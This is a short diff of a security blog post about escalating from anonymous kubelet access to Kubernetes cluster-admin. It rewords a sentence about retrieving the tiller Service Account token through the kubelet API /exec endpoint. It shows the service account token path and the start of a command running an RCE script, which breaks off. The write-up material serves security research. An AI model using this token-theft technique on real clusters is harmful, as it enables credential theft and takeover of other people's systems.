serain/serain.github.io/_posts/2019-01-09-kubelet-from-anonymous-to-cluster-admin.markdown

 /var/run/secrets/kubernetes.io/serviceaccount/token
 ```

-The token for the `tiller` Service Account can thus be retrieved by using the API `/exec` endpoint to print it out:
+The token for the `tiller` Service Account can thus be retrieved by using the `kubelet` API `/exec` endpoint to print it out:

 ```
 $ python3 kubelet-anon-rce.py           \